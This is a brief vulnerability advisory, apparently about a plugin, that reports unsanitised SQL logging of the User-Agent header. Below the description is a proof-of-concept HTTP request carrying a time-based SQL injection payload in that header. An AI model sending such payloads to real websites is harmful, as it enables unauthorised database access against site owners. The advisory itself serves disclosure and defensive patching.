The plugin does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue
GET / HTTP/1.1
User-Agent: \'+SLEEP(5))-- g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0